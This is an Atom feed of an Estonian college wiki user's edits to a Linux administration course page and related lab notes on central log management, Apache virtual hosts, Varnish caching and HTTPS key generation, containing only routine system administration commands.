Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68977</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68977"/>
		<updated>2013-11-28T11:04:12Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;br /&gt;
&lt;br /&gt;
= Ülesande püstitus =&lt;br /&gt;
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.&lt;br /&gt;
&lt;br /&gt;
Server: Ubuntu Server 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
Klient: Ubuntu client 64bit, &#039;&#039;&#039;versioon&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
= Kasutatud tarkvara =&lt;br /&gt;
Logstash, elasticsearch, kibana&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68976</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68976"/>
		<updated>2013-11-28T11:01:16Z</updated>

		<summary type="html">&lt;p&gt;Saus: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
&lt;br /&gt;
Sten Aus&lt;br /&gt;
&lt;br /&gt;
A32&lt;br /&gt;
&lt;br /&gt;
28.11.2013&lt;br /&gt;
&lt;br /&gt;
Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68975</id>
		<title>Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine_-_Labor_2_(keskse_logihalduse_rakendamine)_protokoll&amp;diff=68975"/>
		<updated>2013-11-28T11:00:32Z</updated>

		<summary type="html">&lt;p&gt;Saus: Created page with &amp;quot;Labor 2 protokoll - keskse logihalduse rakendamine Sten Aus A32 28.11.2013&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Labor 2 protokoll - keskse logihalduse rakendamine&lt;br /&gt;
Sten Aus&lt;br /&gt;
A32&lt;br /&gt;
28.11.2013&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=68974</id>
		<title>Linuxi administreerimine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Linuxi_administreerimine&amp;diff=68974"/>
		<updated>2013-11-28T11:00:08Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Keskne logiserver */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Üldinfo=&lt;br /&gt;
ECTS: 4&lt;br /&gt;
Hindamisviis: Eksam&lt;br /&gt;
&lt;br /&gt;
==Õppejõud==&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Katrin Loodus&lt;br /&gt;
&lt;br /&gt;
=Eeldused ja sihtgrupp=&lt;br /&gt;
&lt;br /&gt;
Operatsioonisüsteemide administreerimine ja sidumine (Rangelt soovituslik). Osadmin aines loetava oskamine on antud aine õppimise eelduseks. ÕISis on see eeldus märgitud soovituslikuks, kuna igal aastal on paar inimest, kes suudavad mõlemad ained korraga läbida ja on antud vallas väga pädevad.&lt;br /&gt;
Linuxi administraatori kursus on mõeldud tugeva infotehnoloogilise põhjaga arvuti-spetsialistile.&lt;br /&gt;
Kursuse rõhk on eelkõige võrguhalduril, kelle tööülesannete hulka kuulub igapäevane serverite, võrgu jms hooldus, konfigureerimine ja uute seadmete installatsioon.&lt;br /&gt;
&lt;br /&gt;
=Eesmärk ja sisu=&lt;br /&gt;
&lt;br /&gt;
Kursuse esimeses osas õpitakse tundma Linux süsteemi toimimist, antakse ülevaade administreerimistoimingute automatiseerimisest shelli skriptide abil ja omandatakse praktiline käsufailide koostamise kogemus.&lt;br /&gt;
&lt;br /&gt;
Teises osas õpitakse paigaldama ja konfigureerima erinevaid võrguteenuseid. Kursuse teise osa alguses korratakse taseme ühtlustamiseks TCP/IP võrgu põhialuseid.&lt;br /&gt;
&lt;br /&gt;
=Õpiväljundid=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Loengud=&lt;br /&gt;
&lt;br /&gt;
Kaugõppe loengute ja praktikumide videosalvestused:&lt;br /&gt;
http://echo360.e-ope.ee/ess/portal/section/4bd0abde-1b0d-4c92-a35e-0f99a81f069d&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1. Sissejuhatav loeng eeldustest [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng01%20-%20Sissejuhatus%20ainesse%20Linux%20administreerimine%20-%202013%20.pdf Sissejuhatus Loeng 1]&lt;br /&gt;
&lt;br /&gt;
2. Kordamine Osadmin [http://elab.itcollege.ee:8000/Linux-Basics.mm]&lt;br /&gt;
&lt;br /&gt;
3. Linux süsteemi põhilised komponendid [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng02%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 2]&lt;br /&gt;
&lt;br /&gt;
4. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng03%20-%20Linux%20s%c3%bcsteemide%20haldamine%20-%202013%20.pdf Linux haldamine Loeng 3]&lt;br /&gt;
&lt;br /&gt;
5. Linux süsteemi haldamine puppet abil [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/loeng04%20-%20Linux%20s%c3%bcsteemide%20haldamine%20II%20-%202013%20.pdf Linux haldamine Loeng 4]&lt;br /&gt;
&lt;br /&gt;
Puppeti teise loengu video: http://elab.itcollege.ee:8000/linux-admin/pupppet-algus.ogv&lt;br /&gt;
&lt;br /&gt;
=Praktikumid=&lt;br /&gt;
&lt;br /&gt;
==Esimene praktikum - Ubuntu Serveri ja kliendi paigaldamine ning kordamine==&lt;br /&gt;
* Paigaldage &#039;&#039;&#039;Ubuntu Linux Server&#039;&#039;&#039; süsteem VirtualBox abil&lt;br /&gt;
**RAM 512MB&lt;br /&gt;
**HDD dynamicly allocated 8GB&lt;br /&gt;
**2 Võrgukaarti NIC1 - NAT (eth0 - Ubuntus) ja NIC2 - HostOnly (eth1 - Ubuntus)&lt;br /&gt;
**Logige serverisse sisse ja seadistage võrk failis /etc/network/interfaces (liidese eth1 ip aadress 192.168.56.200). &lt;br /&gt;
***Abiinfo [[Ubuntu server võrgu seadistamine]] ja [[VirtualBoxi võrgud]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet static&lt;br /&gt;
  address 192.168.56.200&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Paigaldage openssh server, kui te seda installi käigus ei teinud (apt-get update &amp;amp;&amp;amp; apt-get install ssh)&lt;br /&gt;
&lt;br /&gt;
Ubuntu Server 12.04.1 LTS ISO (64bit) http://elab.itcollege.ee:8000/ubuntu-12.04.1-server-amd64.iso&lt;br /&gt;
&lt;br /&gt;
Eelduste kontrollimise test harjutamiseks: http://goo.gl/73xBZ&lt;br /&gt;
Kes tunneb, et test on &#039;&#039;&#039;liiga keeruline&#039;&#039;&#039;, peab &#039;&#039;&#039;kaaluma&#039;&#039;&#039; aine deklareerimise asemel &#039;&#039;&#039;Osadmin aine (mis on soovituslik eeldus) läbimist&#039;&#039;&#039;.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Ubuntu Desktop Linux&#039;&#039;&#039; paigaldamine (Võib paigaldada ka mõne muu disrtibutsiooni desktop masina, kuna seda läheb meil niikuinii hiljem vaja)&lt;br /&gt;
**Memory 1024MB&lt;br /&gt;
**HDD 16GB (või 8GB) Dynamic disk&lt;br /&gt;
**Network&lt;br /&gt;
**Video Memory 64MB 3D acceleration sisse&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;NB! Kasutamiseks valmis masinad: [http://elab.itcollege.ee:8000/ubuntu-server-64.ova server 64bit] ja [http://elab.itcollege.ee:8000/ubuntu-desktop-64.ova klient 64bit], [http://elab.itcollege.ee:8000/UbuntuServer32bit.ova server 32bit] ja [http://elab.itcollege.ee:8000/UbuntuDesktop32bit.ova klient 32bit]&#039;&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
Pärast paigaldamist seadistada [https://wiki.itcollege.ee/index.php/OpenSSH:_v%C3%B5tmetega_autentimine key based autentimisega] serverisse sisenemine. (tööjaamast saab serveris käske käivitada)&lt;br /&gt;
&lt;br /&gt;
==Teine ja kolmas praktikum - Eeldustetest ja kordamine==&lt;br /&gt;
&lt;br /&gt;
Kordamiseks leiate vajalikku infot [https://wiki.itcollege.ee/index.php/Category:Operatsioonis%C3%BCsteemide_administreerimine_ja_sidumine Operatsioonisüsteemide administreerimise ja sidumise] aine vikist. &lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/AFGfoV Eeldustetest 1]&lt;br /&gt;
&lt;br /&gt;
[http://goo.gl/F0PiWK Eeldustetest 2]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Linux keskhaldus puppet baasil==&lt;br /&gt;
&lt;br /&gt;
Praktikumis paigaldame puppet serveri (master) ja kliendi.&lt;br /&gt;
&lt;br /&gt;
Näiteülesanded kaitsmiseks&lt;br /&gt;
&lt;br /&gt;
1. Loo puppet abil fail /etc/issue sisuga KALA&lt;br /&gt;
&lt;br /&gt;
2. Loo puppet abil kasutaja polekala, kodukaustaga /home/polekala, shelliga /bin/zsh ( tee ka paki zsh paigaldus)&lt;br /&gt;
&lt;br /&gt;
3. Lisa nodele class tarkvara, mis paigaldab htop, bpython pakid&lt;br /&gt;
&lt;br /&gt;
4. Loo nodele class eemalda, mis eemaldab paki cowsay&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
5. Viimane ülesanne on igal ühel erinev.&lt;br /&gt;
&lt;br /&gt;
5.1 Loo serverisse kasutaja kala ja tee talle ssh key. Seadista kliendiarvuti selliselt, et paigaldataks pakk ssh ja lisataks root kasutajale kliendis loodud ssh public key.&lt;br /&gt;
&lt;br /&gt;
5.2 Paigalda kliendi arvutisse ntp server ja määra ntp serveriteks ntp.eenet.ee ja ntp.ut.ee&lt;br /&gt;
&lt;br /&gt;
5.3 Lisa kliendi arvutisse apache2 veebiserver koos virtualhostiga www.planet.zz, (failis /var/www/www.planet.zz/index.html on rida www.planet.zz)&lt;br /&gt;
Apache konfis peab olema ServerName www.planet.zz ja sites-enabled all sait www.planet.zz&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Keskne logiserver==&lt;br /&gt;
Labor 2 üheks võimalikuks teemaks on keskse logihalduse lahenduse loomine&lt;br /&gt;
&lt;br /&gt;
[[Keskse logilahenduse rakendamine]]&lt;br /&gt;
&lt;br /&gt;
[http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf  Lõputöö logihalduse teemal]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
http://rdstash.blogspot.com/2013/01/installing-logstash-as-syslog-server-on.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll]] - Sten Aus 28.11.2013&lt;br /&gt;
&lt;br /&gt;
=Esseede teemad 2012=&lt;br /&gt;
&lt;br /&gt;
Võib valida keerulisemaid teemasid ka [[Osadmin referaadi teemad]] lehelt.&lt;br /&gt;
&lt;br /&gt;
[[zsh]] - pole algajale&lt;br /&gt;
&lt;br /&gt;
Mida uurida &lt;br /&gt;
&lt;br /&gt;
Prompt&lt;br /&gt;
&lt;br /&gt;
http://zshwiki.org/home/config/prompt&lt;br /&gt;
&lt;br /&gt;
http://stevelosh.com/blog/2010/02/my-extravagant-zsh-prompt/&lt;br /&gt;
&lt;br /&gt;
.zshrc&lt;br /&gt;
&lt;br /&gt;
for &lt;br /&gt;
&lt;br /&gt;
if &lt;br /&gt;
&lt;br /&gt;
while &lt;br /&gt;
&lt;br /&gt;
jne&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[exFAT vs Linux]] - Kalju Hõbemäe&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[CentOS Server]] --- teeb Oliver Naaris&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Superb Mini Server]] --- Mark-Erik Mogom, Andrus Dei &lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
DNS, samba, LDAP, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Oracle Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba, e-post seadistamine&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Suse Linux]]&lt;br /&gt;
&lt;br /&gt;
Paigaldamine&lt;br /&gt;
&lt;br /&gt;
Teenuste DNS, apache2, samba seadistamine&lt;br /&gt;
&lt;br /&gt;
[[OpenLDAP Ubuntu Serveril]] - Tarmo Suurmägi, Taavi Sannik, Harri Uljas&lt;br /&gt;
&lt;br /&gt;
[[Zentyal SAMBA4]] --- Lang &amp;amp; Lihten A31&lt;br /&gt;
&lt;br /&gt;
Samba4 domeenikontrolleri seadistamine ja ubuntu/fedora/muu süsteem autentimise seadistamine kasutades uusi vahendeid&lt;br /&gt;
&lt;br /&gt;
[[Apt-yum/dpkg-rpm käskude lühivõrdlus]] - Teet Saar A32&lt;br /&gt;
&lt;br /&gt;
[[Ophcrack]] - teeb Kristo Kapten&lt;br /&gt;
&lt;br /&gt;
[[rancid]] - Meelis Kurnikov, Aive Haavel AK31&lt;br /&gt;
&lt;br /&gt;
[[zenoss]] - Kristjan Vaik&lt;br /&gt;
&lt;br /&gt;
[[Apache autentimine LDAP&#039;iga]] - Rauno Lehiste&lt;br /&gt;
&lt;br /&gt;
=Eksamist=&lt;br /&gt;
&lt;br /&gt;
Tee ära labor 2 (oma valitud teemal + selle kohta wiki kirjatöö)&lt;br /&gt;
Eksamil ole valmis demoma labor 1 raames kaitstud asju.&lt;br /&gt;
&lt;br /&gt;
Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus saab kaitsta ka labor 1 ja 2 asju.&lt;br /&gt;
&lt;br /&gt;
Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha  teenusest varukoopia).&lt;br /&gt;
&lt;br /&gt;
Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.&lt;br /&gt;
&lt;br /&gt;
Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.&lt;br /&gt;
&lt;br /&gt;
=Laborimaterjalid 2012=&lt;br /&gt;
&lt;br /&gt;
Teha apt -  yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]&lt;br /&gt;
&lt;br /&gt;
Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)&lt;br /&gt;
&lt;br /&gt;
Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.&lt;br /&gt;
&lt;br /&gt;
Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 4&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Nimeserveri BIND9 paigaldamine.&lt;br /&gt;
&lt;br /&gt;
*Mõtle välja domeenimini&lt;br /&gt;
*Paigalda nimeserver bind9&lt;br /&gt;
*Seadista oma domeen&lt;br /&gt;
**www.domeen&lt;br /&gt;
**ns.domeen&lt;br /&gt;
**sales.domeen&lt;br /&gt;
**seadista oma kliendimasin kasutama uut nimeserverit&lt;br /&gt;
&lt;br /&gt;
NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS&lt;br /&gt;
&lt;br /&gt;
Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]&lt;br /&gt;
&lt;br /&gt;
Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 5&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Veebiserveri apache2 paigaldamine&lt;br /&gt;
&lt;br /&gt;
*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)&lt;br /&gt;
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536&lt;br /&gt;
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)&lt;br /&gt;
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2&lt;br /&gt;
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Praks 7&#039;&#039;&#039;&lt;br /&gt;
Samba share-i välja jagamine. &lt;br /&gt;
&lt;br /&gt;
*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua). &lt;br /&gt;
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale. &lt;br /&gt;
&lt;br /&gt;
*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Punktide&#039;&#039;&#039; (5p) &#039;&#039;&#039;kirja saamiseks&#039;&#039;&#039; on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda. &lt;br /&gt;
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 1&#039;&#039;&#039;&lt;br /&gt;
*Veebiserver ja virtualhostid&lt;br /&gt;
*DNS&lt;br /&gt;
*e-post&lt;br /&gt;
*iptables&lt;br /&gt;
*samba&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Labor 2&#039;&#039;&#039;&lt;br /&gt;
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru&lt;br /&gt;
*Puppet või chef&lt;br /&gt;
*PAM&lt;br /&gt;
*Puppet (Ubuntus) - Kristo Kapten&lt;br /&gt;
*[[Samba(windows domeenis fileserver)]] - Marko Kurs&lt;br /&gt;
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Virtualhost_apache2_n%C3%A4itel&amp;diff=62892</id>
		<title>Virtualhost apache2 näitel</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Virtualhost_apache2_n%C3%A4itel&amp;diff=62892"/>
		<updated>2013-05-06T12:01:49Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Varnish */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/hosts&lt;br /&gt;
&lt;br /&gt;
192.168.56.101  www.planet.zz&lt;br /&gt;
192.168.56.101  sales.planet.zz&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ping www.planet.zz&lt;br /&gt;
&lt;br /&gt;
ping sales.planet.zz    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
apt-get update     &lt;br /&gt;
apt-get dist-upgrade&lt;br /&gt;
&lt;br /&gt;
apt-get install apache2&lt;br /&gt;
&lt;br /&gt;
mkdir -p /var/www/www.planet.zz&lt;br /&gt;
mkdir -p /var/www/sales.planet.zz&lt;br /&gt;
cp /var/www/index.html /var/www/www.planet.zz&lt;br /&gt;
cp /var/www/index.html /var/www/sales.planet.zz&lt;br /&gt;
vim /var/www/www.planet.zz/index.html&lt;br /&gt;
vim /var/www/sales.planet.zz/index.html&lt;br /&gt;
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz&lt;br /&gt;
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz&lt;br /&gt;
&lt;br /&gt;
vim www.planet.zz &lt;br /&gt;
vim sales.planet.zz &lt;br /&gt;
&lt;br /&gt;
a2ensite www.planet.zz&lt;br /&gt;
a2ensite sales.planet.zz &lt;br /&gt;
service apache2 reload&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Varnish=&lt;br /&gt;
Esmaselt tõstame apache2 porti 8080&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/apache2/ports.conf&lt;br /&gt;
NameVirtualHost *:8080&lt;br /&gt;
Listen 8080&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; default -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; wp -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; sales.planet.zz -i&lt;br /&gt;
sed &#039;s/:80/:8080/&#039; www.planet.zz -i&lt;br /&gt;
service apache2 restart&lt;br /&gt;
netstat -lntp&lt;br /&gt;
apt-get install varnish&lt;br /&gt;
vim /etc/default/varnish&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
DAEMON_OPTS=&amp;quot;-a :80 \&lt;br /&gt;
             -T localhost:6082 \&lt;br /&gt;
             -f /etc/varnish/default.vcl \&lt;br /&gt;
             -S /etc/varnish/secret \&lt;br /&gt;
             -s malloc,256m&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sub vcl_recv {&lt;br /&gt;
&lt;br /&gt;
  # Add a unique header containing the client address&lt;br /&gt;
&lt;br /&gt;
  remove req.http.X-Forwarded-For;&lt;br /&gt;
&lt;br /&gt;
  set    req.http.X-Forwarded-For = client.ip;&lt;br /&gt;
&lt;br /&gt;
  # [...]&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service varnish restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan &amp;quot;wp&amp;quot;-nimelist faili.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano wp&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sinna tuleb kirjutada CustomLog&#039;i rea asemele&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta&lt;br /&gt;
&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
cd /etc/apache2/conf.d/&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tee sinna uus fail nimega näiteks &#039;&#039;&#039;varnishlog.conf&#039;&#039;&#039;&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
nano varnishlog.conf&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kirjuta sinna see rida&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
LogFormat &amp;quot;%{X-Forwarded-For}i %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b \&amp;quot;%{Referer}i\&amp;quot; \&amp;quot;%{User-Agent}i\&amp;quot;&amp;quot; varnishcombined&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tee apache2 teenusele restart&lt;br /&gt;
&amp;lt;source lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
service2 apache restart&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=DVWA ründed=&lt;br /&gt;
=HTTPS konfigureerimine=&lt;br /&gt;
&lt;br /&gt;
ssh-keygen &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Generating public/private rsa key pair.&lt;br /&gt;
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Enter passphrase (empty for no passphrase): &lt;br /&gt;
Enter same passphrase again: &lt;br /&gt;
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.&lt;br /&gt;
